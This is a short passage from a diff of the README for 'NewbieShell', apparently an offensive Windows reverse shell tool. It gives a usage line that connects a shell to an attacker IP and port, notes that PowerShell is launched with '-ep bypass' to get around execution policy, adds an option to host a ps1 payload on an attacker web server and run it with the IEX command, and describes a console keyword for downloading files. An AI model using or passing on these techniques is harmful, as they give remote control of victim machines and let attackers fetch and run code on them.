hackximus/NewbieShell/README.md

 Example: NewbieShell.exe 192.168.0.1 80 cmd.exe

 If Powershell.exe is executed, then NewbieShell executes the command "-ep bypass" in the background.
 This sets the ExecutionPolicy to bypass.

+The third option is via a ps1 file.
+It is possible to run a web server on the attacker machine and then execute the code with the Powershell IEX command.
+Please note that in this option the IP address and the port on the ps1 file should be changed.

 ### NewbieShell Console
 All Windows commands can be inserted normally.
 For example, if you want to download something from a web server, then you have the possibility to execute a download with so-called keywords.
 The keyword for download is #D